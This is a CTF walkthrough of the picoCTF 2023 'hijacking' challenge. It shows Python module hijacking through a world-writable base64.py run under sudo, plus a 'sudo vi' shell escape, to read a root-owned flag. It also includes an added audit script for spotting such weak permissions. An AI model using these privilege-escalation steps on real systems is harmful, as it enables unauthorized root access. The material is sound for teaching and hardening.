Level: Medium
Tags: picoCTF 2023, Binary Exploitation, privilege_escalation
Author: THEONESTE BYAGUTANGAZA
Description:
Getting root access can allow you to read the flag.
Luckily there is a python file that you might like to play with.
Through Social engineering, we've got the credentials to use on the server.
SSH is running on the server.
saturn.picoctf.net 52735
Username: picoctf
Password: urTi-qvQtA
Hints:
1. Check for Hidden files
2. No place like Home:)
Challenge link: https://play.picoctf.org/practice/challenge/352
We start by connecting to the server:
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2023/Binary_Exploitation/hijacking]
└─$ ssh -p 52735 picoctf@saturn.picoctf.net
The authenticity of host '[saturn.picoctf.net]:52735 ([13.59.203.175]:52735)' can't be established.
ED25519 key fingerprint is SHA256:lAxuAwDPxkngr5Aw0vqCbwmNz/+0ii8HjltkWeRcMjw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[saturn.picoctf.net]:52735' (ED25519) to the list of known hosts.
picoctf@saturn.picoctf.net's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.19.0-1024-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
picoctf@challenge:~$
Then we look for the python file mentioned in the challenge description:
picoctf@challenge:~$ ls -la
total 16
drwxr-xr-x 1 picoctf picoctf 20 Nov 4 15:38 .
drwxr-xr-x 1 root root 21 Aug 4 21:10 ..
-rw-r--r-- 1 picoctf picoctf 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 picoctf picoctf 3771 Feb 25 2020 .bashrc
drwx------ 2 picoctf picoctf 34 Nov 4 15:38 .cache
-rw-r--r-- 1 picoctf picoctf 807 Feb 25 2020 .profile
-rw-r--r-- 1 root root 375 Mar 16 2023 .server.py
The python script is owned by root, so we are not allowed to modify it.
Let's check what it contains:
picoctf@challenge:~$ cat .server.py
import base64
import os
import socket
ip = 'picoctf.org'
response = os.system("ping -c 1 " + ip)
#saving ping details to a variable
host_info = socket.gethostbyaddr(ip)
#getting IP from a domain
host_info_to_str = str(host_info[2])
host_info = base64.b64encode(host_info_to_str.encode('ascii'))
print("Hello, this is a part of information gathering",'Host: ', host_info)
Next, let's check what we can run with sudo:
picoctf@challenge:~$ sudo -l
Matching Defaults entries for picoctf on challenge:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User picoctf may run the following commands on challenge:
(ALL) /usr/bin/vi
(root) NOPASSWD: /usr/bin/python3 /home/picoctf/.server.py
As expected, we can run the server file with python, but we can also run vi.
We will try to hijack one of the python modules used in the server file, that is base64, os or socket.
First, we find the module search path that python uses:
picoctf@challenge:~$ python3
Python 3.8.10 (default, May 26 2023, 14:05:08)
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> print(sys.path)
['', '/usr/lib/python38.zip', '/usr/lib/python3.8', '/usr/lib/python3.8/lib-dynload', '/usr/local/lib/python3.8/dist-packages', '/usr/lib/python3/dist-packages']
>>> exit()
Next, we check the file permissions for the module files in the /usr/lib/python3.8 directory:
picoctf@challenge:/usr/lib/python3.8$ ls -la base64.py os.py socket.py
-rwxrwxrwx 1 root root 20382 May 26 14:05 base64.py
-rw-r--r-- 1 root root 38995 May 26 14:05 os.py
-rw-r--r-- 1 root root 35243 May 26 14:05 socket.py
Ah, perfect: we can modify the base64.py file.
But we still don't know the name of the flag file.
We can use vi to read the /root directory just like any file:
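The manual checks above (which modules the script imports, where python resolves them, and who may write to those files) can be scripted as a hardening audit for any script that sudo allows to run as root. The following is an added example, not code from the original writeup; the function names and the constructed sample files are my own. It also checks the script's own directory, because python places that directory first on sys.path for `python3 script.py`, so it must be root-owned as well.

```python
import stat
import sys
from pathlib import Path
import ast

def imported_modules(script_path):
    """Top-level module names the script imports (static scan with ast)."""
    tree = ast.parse(Path(script_path).read_text(), filename=str(script_path))
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)

def resolve_module(name, search_path):
    """First name.py or name/__init__.py found on search_path wins, as for `import name`."""
    for d in search_path:
        base = Path(d or ".")
        for cand in (base / f"{name}.py", base / name / "__init__.py"):
            if cand.is_file():
                return cand
    return None

def weak_perms(path):
    """Reasons why someone other than root could alter this path."""
    st = path.stat()
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append("group-writable by non-root group %d" % st.st_gid)
    if st.st_uid != 0:
        reasons.append("owned by uid %d, not root" % st.st_uid)
    return reasons

def audit_root_script(script_path, search_path=None):
    """Findings as (path, reason) for the script, its directory, every search-path
    directory, and each imported module that resolves to a file on that path.
    search_path defaults to the script's directory followed by this interpreter's
    sys.path, mirroring what `sudo python3 script.py` would use."""
    script = Path(script_path).resolve()
    if search_path is None:
        search_path = [str(script.parent)] + sys.path[1:]
    targets = [script, script.parent]
    targets += [Path(d or ".") for d in search_path if Path(d or ".").is_dir()]
    targets += [m for m in (resolve_module(n, search_path) for n in imported_modules(script)) if m]
    return [(str(p), r) for p in targets for r in weak_perms(p)]
```

Run on the challenge box as `audit_root_script('/home/picoctf/.server.py')`, it would report /usr/lib/python3.8/base64.py as world-writable and /home/picoctf as owned by a non-root user, the two conditions this writeup relies on.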
picoctf@challenge:/usr/lib/python3.8$ sudo vi /root/
[sudo] password for picoctf:
The result is:
" ============================================================================
" Netrw Directory Listing (netrw v165)
" /root
" Sorted by name
" Sort sequence: [\/]$,\<core\%(\.\d\+\)\=\>,\.h$,\.c$,\.cpp$,\~\=\*$,*,\.o$,\.obj$,\.info$,\.swp$,\.bak$,\~$
" Quick Help: <F1>:help -:go up dir D:delete R:rename s:sort-by x:special
" ==============================================================================
../
./
.vim/
.bashrc
.flag.txt
.profile
So now we know that the flag file is /root/.flag.txt.
We add the following line to the base64.py file after the shebang:
print(open('/root/.flag.txt', 'r').read())
And finally, we run the server with sudo to get the flag:
picoctf@challenge:/usr/lib/python3.8$ sudo python3 ~/.server.py
picoCTF{<REDACTED>}
sh: 1: ping: not found
Traceback (most recent call last):
File "/home/picoctf/.server.py", line 7, in <module>
host_info = socket.gethostbyaddr(ip)
socket.gaierror: [Errno -5] No address associated with hostname
A more direct approach is to launch a shell from vi:
picoctf@challenge:~$ sudo vi -c ':!/bin/sh'
[sudo] password for picoctf:
# cd /root
# ls -la
total 12
drwx------ 1 root root 23 Aug 4 21:12 .
drwxr-xr-x 1 root root 51 Nov 4 16:06 ..
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
-rw-r--r-- 1 root root 43 Aug 4 21:12 .flag.txt
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
# cat .flag.txt
picoCTF{<REDACTED>}